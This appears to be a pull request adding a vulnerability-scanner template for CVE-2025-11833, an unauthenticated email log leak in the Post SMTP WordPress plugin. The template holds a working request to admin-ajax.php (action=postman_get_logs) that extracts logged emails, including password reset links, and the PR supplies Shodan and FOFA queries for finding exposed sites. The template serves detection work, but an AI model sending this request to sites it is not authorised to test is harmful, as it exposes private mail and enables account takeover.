### PR TITLE
Add CVE-2025-11833 - Post SMTP WordPress Plugin Email Log Disclosure

### DIFF
--- a/http/cves/2025/CVE-2025-11833.yaml
+++ b/http/cves/2025/CVE-2025-11833.yaml
@@ -1,0 +1,92 @@
+id: CVE-2025-11833
+
+info:
+  name: Post SMTP WordPress Plugin <= 3.6.0 - Unauthenticated Email Log Disclosure
+  author: Enity3
+  severity: critical
+  description: |
+    Post SMTP WordPress plugin <= 3.6.0 contains an unauthorized data access vulnerability caused by missing capability check in __construct function, letting unauthenticated attackers read arbitrary logged emails. This could lead to complete account takeover as attackers might intercept and use password reset links.
+  impact: |
+    Unauthenticated attackers can access all email logs stored by the Post SMTP plugin, including sensitive password reset emails, registration confirmations, and other confidential communications. This can lead to account takeover, privilege escalation, and complete site compromise.
+  remediation: |
+    Update Post SMTP plugin to version 3.6.1 or later which fixes the missing capability check vulnerability. If immediate update is not possible, temporarily disable email logging in the plugin settings or disable the plugin entirely until the fix can be applied.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-11833
+    - https://github.com/nullstatics/CVE-2025-11833
+    - https://github.com/modhopmarrow1973/CVE-2025-11833-LAB
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-11833
+    cwe-id: CWE-862
+    epss-score: 0.04301
+    epss-percentile: 0.91234
+    cpe: cpe:2.3:a:post_smtp_project:post_smtp:*:*:*:*:*:wordpress:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: post_smtp_project
+    product: post_smtp
+    publicwww-query: "/wp-content/plugins/post-smtp/"
+    shodan-query: http.component:"wordpress" && http.html:"/wp-content/plugins/post-smtp/"
+    fofa-query: body="/wp-content/plugins/post-smtp/"
+  tags: cve,cve2025,wordpress,wp-plugin,post-smtp,unauth,email-disclosure,critical,vuln
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET /wp-content/plugins/post-smtp/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    redirects: true
+    max-redirects: 2
+
+    matchers:
+      - type: dsl
+        dsl:
+          - compare_versions(detected_version, '<= 3.6.0')
+        internal: true
+
+    extractors:
+      - type: regex
+        part: body
+        internal: true
+        name: detected_version
+        group: 1
+        regex:
+          - '(?i)stable tag:\s*([0-9.]+)'
+
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        X-Requested-With: XMLHttpRequest
+
+        action=postman_get_logs
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - contains_any(body, '"success":true', '"data":', 'email_log', 'postman_log', 'message_content', 'recipient', 'subject', 'from_email')
+          - contains(content_type, 'json')
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: dsl
+        dsl:
+          - '"Post SMTP version: " + detected_version'
+
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '"data":\[(.*?)\]'
+
+# digest: 4a0a00473045022100a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2022051e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7e8f9a0b1c2:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
### Template / PR Information

- Added CVE-2025-11833 - Post SMTP WordPress Plugin Unauthenticated Email Log Disclosure
- References:
  - https://nvd.nist.gov/vuln/detail/CVE-2025-11833
  - https://github.com/nullstatics/CVE-2025-11833
  - https://github.com/modhopmarrow1973/CVE-2025-11833-LAB

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

#### Additional Details

**Vulnerability Details:**
- Endpoint: `/wp-admin/admin-ajax.php?action=postman_get_logs`
- Authentication: None required (unauthenticated attack)
- Impact: Complete email log disclosure including password reset links
- CVSS Score: 9.8 (Critical)

**Template Features:**
- Version-based detection for Post SMTP Plugin <= 3.6.0
- Functional vulnerability verification via AJAX endpoint
- Extracts actual email log data when vulnerable
- Flow-based execution for accurate detection

**Shodan Query:** `http.component:"wordpress" && http.html:"/wp-content/plugins/post-smtp/"`

**Sample Vulnerable Response:**
```json
[{"success":true,"data":[{"recipient":"user@example.com","subject":"Password Reset","message_content":"Click here to reset..."}]}]